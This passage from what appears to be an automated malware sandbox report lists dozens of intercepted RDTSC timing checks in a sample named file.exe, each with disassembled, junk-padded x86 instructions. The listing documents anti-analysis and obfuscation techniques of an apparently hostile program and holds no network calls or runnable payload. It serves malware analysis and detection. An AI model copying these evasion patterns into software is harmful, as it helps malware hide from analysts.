0x00000058 ret 0x00000059 cld 0x0000005a push 00000000h 0x0000005c mov bh, 85h 0x0000005e push eax 0x0000005f jc 00007FF154CE3624h 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B567F1 second address: B567F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B577FC second address: B57802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57802 second address: B5788B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FF154EB2268h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov ebx, 0B627BDAh 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FF154EB2268h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov ebx, dword ptr [ebp+122D20D1h] 0x00000048 push 00000000h 0x0000004a or ebx, dword ptr [ebp+122D1DDAh] 0x00000050 xchg eax, esi 0x00000051 pushad 0x00000052 pushad 0x00000053 push esi 0x00000054 pop esi 0x00000055 jmp 00007FF154EB2273h 0x0000005a popad 0x0000005b jns 00007FF154EB226Ch 0x00000061 popad 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 pop eax 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B589A1 second address: B589B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF154CE3616h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B589B0 second address: B58A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D2BD6h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FF154EB2268h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov ebx, ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007FF154EB2268h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 cmc 0x00000049 push eax 0x0000004a push ecx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B58A0E second address: B58A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57A5F second address: B57A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF154EB2277h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59A0D second address: B59A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59A11 second address: B59A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59A15 second address: B59A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59A1B second address: B59A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59C4C second address: B59C6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF154CE3628h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C9EA second address: B5C9F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C9F0 second address: B5C9FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF154CE3616h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C9FA second address: B5CA80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FF154EB2268h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 or ebx, dword ptr [ebp+12459009h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FF154EB2268h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D37ECh] 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D1AC9h], edi 0x00000055 xchg eax, esi 0x00000056 jmp 00007FF154EB226Dh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FF154EB2271h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5CA80 second address: B5CA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D8F0 second address: B5D8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5CB5A second address: B5CB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D8FF second address: B5D905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0285D second address: B02885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF154CE3616h 0x0000000a jmp 00007FF154CE3624h 0x0000000f popad 0x00000010 push ecx 0x00000011 jc 00007FF154CE3616h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B668A3 second address: B668DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b jmp 00007FF154EB2278h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 jmp 00007FF154EB226Dh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A21C second address: B6A220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A220 second address: B6A272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007FF154EB2279h 0x00000012 jmp 00007FF154EB2273h 0x00000017 popad 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF154EB2273h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A272 second address: B6A282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF154CE361Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A504 second address: B6A50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A50B second address: B6A510 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A510 second address: 9919BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 504A06DAh 0x0000000e jg 00007FF154EB226Eh 0x00000014 push dword ptr [ebp+122D0365h] 0x0000001a cmc 0x0000001b jp 00007FF154EB226Eh 0x00000021 call dword ptr [ebp+122D1AA9h] 0x00000027 pushad 0x00000028 xor dword ptr [ebp+122D1B27h], esi 0x0000002e xor eax, eax 0x00000030 sub dword ptr [ebp+122D1B27h], eax 0x00000036 mov dword ptr [ebp+122D1B27h], edx 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 add dword ptr [ebp+122D1B27h], edx 0x00000047 mov dh, E2h 0x00000049 popad 0x0000004a mov dword ptr [ebp+122D38A4h], eax 0x00000050 jl 00007FF154EB226Ch 0x00000056 sub dword ptr [ebp+122D1B27h], edx 0x0000005c mov esi, 0000003Ch 0x00000061 mov dword ptr [ebp+122D1DFCh], eax 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b cld 0x0000006c lodsw 0x0000006e or dword ptr [ebp+122D1B27h], edi 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 pushad 0x00000079 mov dword ptr [ebp+122D1DFCh], eax 0x0000007f popad 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jl 00007FF154EB226Dh 0x0000008a pushad 0x0000008b sbb bx, D62Dh 0x00000090 popad 0x00000091 nop 0x00000092 push eax 0x00000093 push edx 0x00000094 push eax 0x00000095 push edx 0x00000096 jng 00007FF154EB2266h 0x0000009c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF34F6 second address: AF34FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B713FC second address: B71402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71402 second address: B7140A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7140A second address: B7140F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B719C5 second address: B719CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B3E second address: B71B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB226Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7209A second address: B720A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF154CE3616h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B720A5 second address: B720AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF154EB2266h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B720AF second address: B720D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF154CE3628h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7223D second address: B7226E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FF154EB226Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF154EB2279h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7226E second address: B72272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B723E4 second address: B72401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72401 second address: B7241C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF154CE3626h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72568 second address: B72588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FF154EB2272h 0x0000000d popad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72588 second address: B72591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72591 second address: B725C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2277h 0x00000007 pushad 0x00000008 jne 00007FF154EB2266h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jl 00007FF154EB2280h 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007FF154EB2266h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B725C6 second address: B725CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77E47 second address: B77E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77E4B second address: B77E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77E55 second address: B77E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76A3E second address: B76A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76D5B second address: B76D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7702F second address: B77079 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF154CE362Ah 0x00000008 jmp 00007FF154CE3624h 0x0000000d push edx 0x0000000e jmp 00007FF154CE3621h 0x00000013 jmp 00007FF154CE3624h 0x00000018 pop edx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77079 second address: B7707D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7707D second address: B77099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE3620h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77099 second address: B7709D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7670B second address: B76724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FF154CE361Dh 0x0000000b jnl 00007FF154CE3616h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7765D second address: B77663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77663 second address: B77667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77667 second address: B7767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FF154EB2268h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7767B second address: B7767F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77846 second address: B77892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF154EB2271h 0x0000000b jmp 00007FF154EB2275h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF154EB2278h 0x00000017 jl 00007FF154EB2266h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B8FB second address: B7B8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B8FF second address: B7B90B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF154EB226Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B90B second address: B7B922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF154CE361Ah 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B922 second address: B7B926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82F8C second address: B82FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF154CE3621h 0x0000000d jo 00007FF154CE3616h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83100 second address: B83105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83105 second address: B8311B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF154CE3620h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8311B second address: B83143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF154EB226Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FF154EB2278h 0x00000014 jl 00007FF154EB2272h 0x0000001a jl 00007FF154EB2266h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B832A2 second address: B832A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83526 second address: B8354A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF154EB2266h 0x0000000a jmp 00007FF154EB2279h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8354A second address: B83562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FF154CE3622h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B836A2 second address: B836D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB2273h 0x00000009 jmp 00007FF154EB2279h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83F54 second address: B83F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83F58 second address: B83F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83F62 second address: B83F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF154CE3616h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83F6C second address: B83FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2277h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF154EB2270h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FF154EB226Eh 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83FAA second address: B83FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FF154CE3616h 0x0000000d jmp 00007FF154CE3629h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8440D second address: B84417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF154EB2266h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84417 second address: B8441B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00DBD second address: B00DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB226Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00DD0 second address: B00DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87BAE second address: B87BC3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF154EB226Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d jl 00007FF154EB2266h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87BC3 second address: B87BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FF154CE362Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FF154CE3616h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87BDA second address: B87BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87BDE second address: B87BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A3EC second address: B4A3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
